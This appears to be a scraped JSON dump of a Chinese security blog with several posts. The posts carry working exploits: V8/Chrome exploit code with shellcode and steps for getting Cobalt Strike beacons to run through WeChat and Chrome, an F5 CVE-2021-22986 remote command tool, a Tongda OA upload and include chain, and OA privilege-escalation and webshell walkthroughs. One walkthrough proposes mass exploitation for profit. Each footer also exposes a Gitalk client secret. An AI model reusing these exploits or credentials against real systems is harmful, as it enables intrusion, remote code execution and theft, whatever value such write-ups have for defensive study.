i%=4; if(i == 0) //当所有状态反馈完毕则退出 { Feedback = 0; OnorOff = 0; } } } } else if(OnorOff == 2) { delay(1500); if(Feedback < 5)//小于5 是单独控制 1-4 { Reset_Butt(Feedback);//反馈1-4 OnorOff = 0; }else if(Feedback == 5)//等于5 是 关闭 所有然后1.2s每个的速度反馈所有 { if(millis() - F_time >=1200) { F_time = millis(); i++; Reset_Butt(i); i%=4; if(i == 0) //当所有状态反馈完毕则退出 { Feedback = 0; OnorOff = 0; } } } }} var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"微信3.2.11.151Google内核poc利用上线","slug":"微信3-2-11-151Google内核poc利用上线","date":"2021-09-17T13:08:11.000Z","updated":"2021-09-17T13:08:52.670Z","comments":true,"path":"2021/09/17/微信3-2-11-151Google内核poc利用上线/","link":"","permalink":"http://bo.vuvhz.top/2021/09/17/%E5%BE%AE%E4%BF%A13-2-11-151Google%E5%86%85%E6%A0%B8poc%E5%88%A9%E7%94%A8%E4%B8%8A%E7%BA%BF/","excerpt":"","text":"[转发]微信最新版本3.2.11.151 Google内核poc利用上线cs方式！微信对版本进行了紧急更新，但是忽略了小程序,依旧可执行shellcode!用的小程序上线的微信，最新版的 1<web-view src="https://www.baidu.com"> </web-view> 测试页面进行上线测试 最新版本的微信 POC没变这里大佬是index.html 引用js代码： 1<script src="test.js"></script> poc代码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154ENABLE_LOG = true;IN_WORKER = true;// run calc and hang in a loopvar shellcode = [0x11,0x00,0x21];//前面是例子shellcode替换成自己的 注意是x86的 生成C语言 shellcode 将\\换成“,0” 全部替换后删除首部“,”！function print(data) {}var not_optimised_out = 0;var target_function = (function (value) { if (value == 0xdecaf0) { not_optimised_out += 1; } not_optimised_out += 1; not_optimised_out |= 0xff; not_optimised_out *= 12;});for (var i = 0; i < 0x10000; ++i) { target_function(i);}var g_array;var tDerivedNCount = 17 * 87481 - 8;var tDerivedNDepth = 19 * 19;function cb(flag) { if (flag == true) { return; } g_array = new Array(0); g_array[0] = 0x1dbabe * 2; return 'c01db33f';}function gc() { for (var i = 0; i < 0x10000; ++i) { new String(); }}function oobAccess() { var this_ = this; this.buffer = null; this.buffer_view = null; this.page_buffer = null; this.page_view = null; this.prevent_opt = []; var kSlotOffset = 0x1f; var kBackingStoreOffset = 0xf; class LeakArrayBuffer extends ArrayBuffer { constructor() { super(0x1000); this.slot = this; } } this.page_buffer = new LeakArrayBuffer(); this.page_view = new DataView(this.page_buffer); new RegExp({ toString: function () { return 'a' } }); cb(true); class DerivedBase extends RegExp { constructor() { super( { toString: cb }, 'g' ); this_.buffer = new ArrayBuffer(0x80); g_array[8] = this_.page_buffer; } } var derived_n = eval(`(function derived_n(i) { if (i == 0) { return DerivedBase; } class DerivedN extends derived_n(i-1) { constructor() { super(); return; ${"this.a=0;".repeat(tDerivedNCount)} } } return DerivedN; })`); gc(); new (derived_n(tDerivedNDepth))(); this.buffer_view = new DataView(this.buffer); this.leakPtr = function (obj) { this.page_buffer.slot = obj; return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt); } this.setPtr = function (addr) { this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt); } this.read32 = function (addr) { this.setPtr(addr); return this.page_view.getUint32(0, true, ...this.prevent_opt); } this.write32 = function (addr, value) { this.setPtr(addr); this.page_view.setUint32(0, value, true, ...this.prevent_opt); } this.write8 = function (addr, value) { this.setPtr(addr); this.page_view.setUint8(0, value, ...this.prevent_opt); } this.setBytes = function (addr, content) { for (var i = 0; i < content.length; i++) { this.write8(addr + i, content[i]); } } return this;}function trigger() { var oob = oobAccess(); var func_ptr = oob.leakPtr(target_function); print('[*] target_function at 0x' + func_ptr.toString(16)); var kCodeInsOffset = 0x1b; var code_addr = oob.read32(func_ptr + kCodeInsOffset); print('[*] code_addr at 0x' + code_addr.toString(16)); oob.setBytes(code_addr, shellcode); target_function(0);}try{ print("start running"); trigger();}catch(e){ print(e);} 仅用于学习，请不要用于违法犯罪！！！！ var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"cs批量爆破","slug":"cs批量爆破","date":"2021-09-17T13:04:28.000Z","updated":"2021-09-17T13:05:28.274Z","comments":true,"path":"2021/09/17/cs批量爆破/","link":"","permalink":"http://bo.vuvhz.top/2021/09/17/cs%E6%89%B9%E9%87%8F%E7%88%86%E7%A0%B4/","excerpt":"","text":"cs密码批量爆破显ip显示的更清楚 链接：https://pan.baidu.com/s/1Ht_SCsTIeZM7w-GS8hrhkQ提取码：1234复制这段内容后打开百度网盘手机App，操作更方便哦 之前改的大佬的没有显示ip，然后把ip显示了出来，就不用一个一个去找ip了，结合了单ip破解和多ip破解，ip.txt放ip，pass.txt放密码，结合fofa语句 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"google-0day","slug":"google-0day","date":"2021-04-19T08:38:46.000Z","updated":"2021-04-19T08:42:48.619Z","comments":true,"path":"2021/04/19/google-0day/","link":"","permalink":"http://bo.vuvhz.top/2021/04/19/google-0day/","excerpt":"","text":"Cobalt Strike 利用 Chrome 0day 上线c x64POC (弹记事本的): 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103<script> function gc() { for (var i = 0; i < 0x80000; ++i) { var a = new ArrayBuffer(); } } let shellcode = [0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52, 0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED, 0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44, 0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48, 0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0x38, 0xE0, 0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44, 0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49, 0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41, 0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48, 0xBA, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D, 0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xF0, 0xB5, 0xA2, 0x56, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF, 0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47, 0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89, 0xDA, 0xFF, 0xD5, 0x6E, 0x6F, 0x74, 0x65, 0x70, 0x61, 0x64, 0x2E, 0x65, 0x78, 0x65, 0x00]; var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]); var wasmModule = new WebAssembly.Module(wasmCode); var wasmInstance = new WebAssembly.Instance(wasmModule); var main = wasmInstance.exports.main; var bf = new ArrayBuffer(8); var bfView = new DataView(bf); function fLow(f) { bfView.setFloat64(0, f, true); return (bfView.getUint32(0, true)); } function fHi(f) { bfView.setFloat64(0, f, true); return (bfView.getUint32(4, true)) } function i2f(low, hi) { bfView.setUint32(0, low, true); bfView.setUint32(4, hi, true); return bfView.getFloat64(0, true); } function f2big(f) { bfView.setFloat64(0, f, true); return bfView.getBigUint64(0, true); } function big2f(b) { bfView.setBigUint64(0, b, true); return bfView.getFloat64(0, true); } class LeakArrayBuffer extends ArrayBuffer { constructor(size) { super(size); this.slot = 0xb33f; } } function foo(a) { let x = -1; if (a) x = 0xFFFFFFFF; var arr = new Array(Math.sign(0 - Math.max(0, x, -1))); arr.shift(); let local_arr = Array(2); local_arr[0] = 5.1;//4014666666666666 let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8 arr[0] = 0x1122; return [arr, local_arr, buff]; } for (var i = 0; i < 0x10000; ++i) foo(false); gc(); gc(); [corrput_arr, rwarr, corrupt_buff] = foo(true); corrput_arr[12] = 0x22444; delete corrput_arr; function setbackingStore(hi, low) { rwarr[4] = i2f(fLow(rwarr[4]), hi); rwarr[5] = i2f(low, fHi(rwarr[5])); } function leakObjLow(o) { corrupt_buff.slot = o; return (fLow(rwarr[9]) - 1); } let corrupt_view = new DataView(corrupt_buff); let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff); let idx0Addr = corrupt_buffer_ptr_low - 0x10; let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000; let delta = baseAddr + 0x1c - idx0Addr; if ((delta % 8) == 0) { let baseIdx = delta / 8; this.base = fLow(rwarr[baseIdx]); } else { let baseIdx = ((delta - (delta % 8)) / 8); this.base = fHi(rwarr[baseIdx]); } let wasmInsAddr = leakObjLow(wasmInstance); setbackingStore(wasmInsAddr, this.base); let code_entry = corrupt_view.getFloat64(13 * 8, true); setbackingStore(fLow(code_entry), fHi(code_entry)); for (let i = 0; i < shellcode.length; i++) { corrupt_view.setUint8(i, shellcode[i]); } main();</script> CS开启监听 监听器随意，https的稳定 生成payload 记得勾选64位 获得C的payload 类似这样 取出 shellcode 部分 全局替换 \\ 为 ,0 然后取出来shellcode 放入 chrome 0day 中 替换后 复制出来 放入文章开头的 POC 中 第7行 给shellcode 赋值数组 保存 成 msf.html chrome 浏览器 创建快捷方式到桌面 右键编辑快捷方式 增加 -no-sandbox 参数 关闭沙箱 在chrome浏览器打开 msf.html ， CS 上线！ payload c#weijs 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167ENABLE_LOG = true;IN_WORKER = true;// run calc and hang in a loopvar shellcode = [#shellcode];//shellcode替换成自己的 注意是x86的c#function print(data) {}var not_optimised_out = 0;var target_function = (function (value) { if (value == 0xdecaf0) { not_optimised_out += 1; } not_optimised_out += 1; not_optimised_out |= 0xff; not_optimised_out *= 12;});for (var i = 0; i < 0x10000; ++i) { target_function(i);}var g_array;var tDerivedNCount = 17 * 87481 - 8;var tDerivedNDepth = 19 * 19;function cb(flag) { if (flag == true) { return; } g_array = new Array(0); g_array[0] = 0x1dbabe * 2; return 'c01db33f';}function gc() { for (var i = 0; i < 0x10000; ++i) { new String(); }}function oobAccess() { var this_ = this; this.buffer = null; this.buffer_view = null; this.page_buffer = null; this.page_view = null; this.prevent_opt = []; var kSlotOffset = 0x1f; var kBackingStoreOffset = 0xf; class LeakArrayBuffer extends ArrayBuffer { constructor() { super(0x1000); this.slot = this; } } this.page_buffer = new LeakArrayBuffer(); this.page_view = new DataView(this.page_buffer); new RegExp({ toString: function () { return 'a' } }); cb(true); class DerivedBase extends RegExp { constructor() { // var array = null; super( // at this point, the 4-byte allocation for the JSRegExp `this` object // has just happened. { toString: cb }, 'g' // now the runtime JSRegExp constructor is called, corrupting the // JSArray. ); // this allocation will now directly follow the FixedArray allocation // made for `this.data`, which is where `array.elements` points to. this_.buffer = new ArrayBuffer(0x80); g_array[8] = this_.page_buffer; } } // try{ var derived_n = eval(`(function derived_n(i) { if (i == 0) { return DerivedBase; } class DerivedN extends derived_n(i-1) { constructor() { super(); return; ${"this.a=0;".repeat(tDerivedNCount)} } } return DerivedN; })`); gc(); new (derived_n(tDerivedNDepth))(); this.buffer_view = new DataView(this.buffer); this.leakPtr = function (obj) { this.page_buffer.slot = obj; return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt); } this.setPtr = function (addr) { this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt); } this.read32 = function (addr) { this.setPtr(addr); return this.page_view.getUint32(0, true, ...this.prevent_opt); } this.write32 = function (addr, value) { this.setPtr(addr); this.page_view.setUint32(0, value, true, ...this.prevent_opt); } this.write8 = function (addr, value) { this.setPtr(addr); this.page_view.setUint8(0, value, ...this.prevent_opt); } this.setBytes = function (addr, content) { for (var i = 0; i < content.length; i++) { this.write8(addr + i, content[i]); } } return this;}function trigger() { var oob = oobAccess(); var func_ptr = oob.leakPtr(target_function); print('[*] target_function at 0x' + func_ptr.toString(16)); var kCodeInsOffset = 0x1b; var code_addr = oob.read32(func_ptr + kCodeInsOffset); print('[*] code_addr at 0x' + code_addr.toString(16)); oob.setBytes(code_addr, shellcode); target_function(0);}try{ print("start running"); trigger();}catch(e){ print(e);} var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"金和协同水平越权漏洞","slug":"金和协同水平越权漏洞","date":"2021-04-04T03:43:29.000Z","updated":"2021-04-04T03:59:22.311Z","comments":true,"path":"2021/04/04/金和协同水平越权漏洞/","link":"","permalink":"http://bo.vuvhz.top/2021/04/04/%E9%87%91%E5%92%8C%E5%8D%8F%E5%90%8C%E6%B0%B4%E5%B9%B3%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"0day 3.28 金和协同管理OA平台. 水平越权漏洞此洞是由 goddmeon 师傅挖掘并授权发表。 在此感谢 goddmeon 师傅。 FoFA语法： body=”金和协同管理平台” && country=”CN” 默认口令 admin / 000000 后台登录水平越权 C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=想要的id用户 这个id指的是用户编号 登录，用过用户管理，看到用户编号0001为董事长 这是admin管理员权限登录的界面 为了验证水平越权漏洞，我们登录一个普通用户账号，下面是普通用户登录后的界面。 访问url: 12http://www.xxxxxxx.net/C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=0001 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"智慧教育越权","slug":"智慧教育越权","date":"2021-04-04T03:32:18.000Z","updated":"2021-04-04T03:33:37.215Z","comments":true,"path":"2021/04/04/智慧教育越权/","link":"","permalink":"http://bo.vuvhz.top/2021/04/04/%E6%99%BA%E6%85%A7%E6%95%99%E8%82%B2%E8%B6%8A%E6%9D%83/","excerpt":"","text":"智慧教育平台越权上传漏洞通杀拿webshell 1.fofa语法： 1/Widget/common/Service/CommonWidgetService.asmx/Categorylist 2.漏洞越权位置 1/SmartMobile/MobileIndex.aspx?uname=admin&orgId=0 有的会提示输入账号密码，直接访问这个注册，就可以注册 1Module/SSO/SJS_Register.aspx 可以登录个人后台， 3.登录后可以重普通用户越权到admin管理员用户 4.在个人页面抓包可以发现以get方式传输 试试有没有注入或者越权就加个?id=123 ?user=miko没有注入。。。。 当把user换成admin时 既然到了admin里面，这里应该有admin的cookie吧，于是直接又登录之前的越权漏洞地址，应该能到管理员后台 5.成功了 6.找上传点改filetype标签不行，加了个aspx，改了个aspx，还是不行，于是直接抓包，掏出burp 7.传不了，图片可以传，但是aspx传的时候进度条不动，。。。。卡住了，于是做图片马aspx加图片，哦呦，进去了，但是访问后报错 于是找大佬问问，大佬也试了一下，大佬用的asp加图片，于是我也改asp加图片嘿嘿 8.成功拿下webshell 目前发现这套模板可以写个批量拿站脚本，日收益会很不错，有些这个模板已经修复了，但是查找的高达90%都有这些漏洞。 漏洞复现 | （通用0day）好视通视频会议平台存在任意文件下载漏洞 https://mp.weixin.qq.com/s?__biz=Mzg5NjU3NzE3OQ==&mid=2247484986&idx=1&sn=55c43e01fb9cce6962272045c263fd83&chksm=c07fbdcef70834d8869f57ebd926e4237fb4379b317ac7aaa271a68c20ce99a5b054c283c7df&mpshare=1&scene=23&srcid=0404byavRK4wQ0q01VcNxxQ5&sharer_sharetime=1617496800125&sharer_shareid=f18a0e6ff07a610f239caab878f64be5#rd var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"通达OA_v11.7文件上传","slug":"通达OA","date":"2021-03-23T13:38:16.000Z","updated":"2021-03-23T13:39:10.659Z","comments":true,"path":"2021/03/23/通达OA/","link":"","permalink":"http://bo.vuvhz.top/2021/03/23/%E9%80%9A%E8%BE%BEOA/","excerpt":"","text":"通达OA_v11.7 文件上传+文件包含 通达OA_v11.7 文件上传+文件包含1.任意用户登录 12/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 2.文件上传(后台) 123456789101112131415161718POST /general/reportshop/utils/upload.php?action=upload&newid=/../../../../general/reportshop/workshop/report/attachment-remark/ HTTP/1.1Host: 192.168.238.141Content-Length: 197Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk6YsCa9EZHcaYYulAccept: */*Accept-Encoding: gzip, deflateCookie:PHPSESSID=e30i0923fb8vol34kldc0sqhn7Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5Connection: close------WebKitFormBoundaryk6YsCa9EZHcaYYulContent-Disposition: form-data; name="FILE1"; filename="ceshi.txt"Content-Type: text/plainhello world------WebKitFormBoundaryk6YsCa9EZHcaYYul-- 3.文件包含(后台) 12/ispirit/interface/gateway.php?json={}&url=general/reportshop/workshop/report/attachment-remark/}_ceshi.txt 利用链已在工具中更新 相对于redis那条利用链, 可优先使用它 和其他版本一样, 获取cookie后点击”后台getshell”即可(会自动识别v11.7版本的) 圈子专版 链接：https://pan.baidu.com/s/1VIuJ-5dZ0ENtpvUTfI-Vmw提取码：rjhd GitHub项目地址https://github.com/xinyu2428/TDOA_RCE var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"CVE-2021-22986复现","slug":"CVE-2021-22986","date":"2021-03-23T13:34:37.000Z","updated":"2021-03-23T13:35:31.819Z","comments":true,"path":"2021/03/23/CVE-2021-22986/","link":"","permalink":"http://bo.vuvhz.top/2021/03/23/CVE-2021-22986/","excerpt":"","text":"CVE-2021-22986 复现数据包如下: 1234567891011POST /mgmt/tm/util/bash HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0)Accept: */*Connection: closeAuthorization: Basic YWRtaW46X-F5-Auth-Token: Content-Length: 46Content-Type: application/json{"command": "run", "utilCmdArgs": "-c id"} 工具使用 go 简单写一下，代码有点 low 下载地址：https://github.com/yuyan-sec/Poc-Project/tree/main/F5相关代码： 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778package mainimport ( "fmt" "net/http" "io/ioutil" "crypto/tls" "time" "bytes" "regexp" "strings" "flag")func main(){ var host,cmd string flag.StringVar(&host,"u","","URL: http://127.0.0.1") flag.StringVar(&cmd,"c","","CMD: id") flag.Parse() if host == "" || cmd == ""{ fmt.Println(`███████╗███████╗ ██████╗ ██████╗███████╗██╔════╝██╔════╝ ██╔══██╗██╔════╝██╔════╝█████╗ ███████╗ ██████╔╝██║ █████╗ ██╔══╝ ╚════██║ ██╔══██╗██║ ██╔══╝ ██║ ███████║ ██║ ██║╚██████╗███████╗╚═╝ ╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝ CVE-2021-22986 Author: @yuyan-sec`) }else{ exp(host,cmd) }}func exp(url, cmd string){ t := &http.Transport{ TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, } c := &http.Client{ Transport: t, Timeout: 5 * time.Second, } url = strings.TrimRight(url,"/") url = url + "/mgmt/tm/util/bash" payload := []byte("{\\"command\\": \\"run\\", \\"utilCmdArgs\\": \\"-c "+ cmd +"\\"}") r, err := http.NewRequest("POST", url, bytes.NewBuffer(payload)) r.Header.Set("Content-Type", "application/json") r.Header.Set("X-F5-Auth-Token", "") r.Header.Set("Authorization", "Basic YWRtaW46") resp, err := c.Do(r) if err != nil{ return } defer resp.Body.Close() body, err := ioutil.ReadAll(resp.Body) if err != nil{ return } if resp.StatusCode == 200{ reg := regexp.MustCompile(`"commandResult":"(.*?)\\\\n`) commandResult := reg.FindAllStringSubmatch(string(body),-1) result := commandResult[0][1] result = strings.Replace(result,"context=system_u:system_r:initrc_t:s0","",-1) fmt.Println(result) }else{ fmt.Println("fail") }} [转]@yuyan大佬 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"MessageSolution邮件bug","slug":"MessageSolution","date":"2021-03-23T13:31:20.000Z","updated":"2021-03-23T13:32:43.615Z","comments":true,"path":"2021/03/23/MessageSolution/","link":"","permalink":"http://bo.vuvhz.top/2021/03/23/MessageSolution/","excerpt":"","text":"MessageSolution邮件归档系统EEA 信息泄露漏洞 Goby脚本编写简介:MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏，泄露Windows服务器administrator hash与web账号密码. 搜索语法 1title="MessageSolution Enterprise Email Archiving (EEA)" 漏洞地址http://ip:port/authenticationserverservlet/漏洞验证 得到一个管理员的账户密码 一个用户的账户密码 Goby脚本编写 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859{ "Name": "MessageSolution-Information-leakage", "Level": "3", "Tags": [], "GobyQuery": "title=\\"MessageSolution Enterprise Email Archiving (EEA)\\"", "Description": "", "Product": "", "Homepage": "https://www.secquan.org/", "Author": "Jaky", "Impact": "", "Recommandation": "", "References": [ "https://www.secquan.org/" ], "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/authenticationserverservlet/", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "regex", "value": "username", "bz": "" }, { "type": "item", "variable": "$body", "operation": "regex", "value": "password", "bz": "" } ] }, "SetVariable": [] } ], "PostTime": "2021-03-23 08:44:36", "GobyVersion": "1.8.255"} 脚本存放脚本验证 [转]@Jaky大佬 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"phpstudy后门","slug":"phpstudy后门","date":"2021-03-09T10:57:47.000Z","updated":"2021-03-09T11:23:09.348Z","comments":true,"path":"2021/03/09/phpstudy后门/","link":"","permalink":"http://bo.vuvhz.top/2021/03/09/phpstudy%E5%90%8E%E9%97%A8/","excerpt":"","text":"#phpstudy后门利用创建靶机使用burp抓取数据包 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"锐捷RG-UAC","slug":"锐捷RG-UAC","date":"2021-03-09T10:47:53.000Z","updated":"2021-03-09T10:48:36.708Z","comments":true,"path":"2021/03/09/锐捷RG-UAC/","link":"","permalink":"http://bo.vuvhz.top/2021/03/09/%E9%94%90%E6%8D%B7RG-UAC/","excerpt":"","text":"#CNVD-2021-14536锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞 FOFA:title=\"RG-UAC登录页面\" && body=\"admin\" #检测#POC也没啥可POC的，ctrl+shift+i或者F12就是了接下来是欣赏马赛克的环节 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"驾校通网上约车系统漏洞分享","slug":"驾校通网系统漏洞","date":"2021-03-07T13:59:18.000Z","updated":"2021-03-07T14:09:50.860Z","comments":true,"path":"2021/03/07/驾校通网系统漏洞/","link":"","permalink":"http://bo.vuvhz.top/2021/03/07/%E9%A9%BE%E6%A0%A1%E9%80%9A%E7%BD%91%E7%B3%BB%E7%BB%9F%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"#驾校通网上约车系统漏洞分享1039家校通网上约车系统是一款驾校一体化系统。北京壹零叁玖科技发展有限公司(简称1039公司)是国内第一家专业从事培训行业标准化软件开发和大型应用性平台的高科技企业，是培训行业信息化建设的最佳合作伙伴。 Google Hack: intitle: 1039家校通 ###漏洞利用###SQL注入万能密码影响版本: 家校通v1.0 - v.6.0 登录接口 /admin/Product/Comstye.aspx /Student/StudentLogin.aspx /Teacher/Index.aspx ###管理员 用户名密码均输入： ‘ or ‘’=’ （都是单引号）可直接进入。登陆后可任意修改网站内容 ###教练点评处存在SQL注入 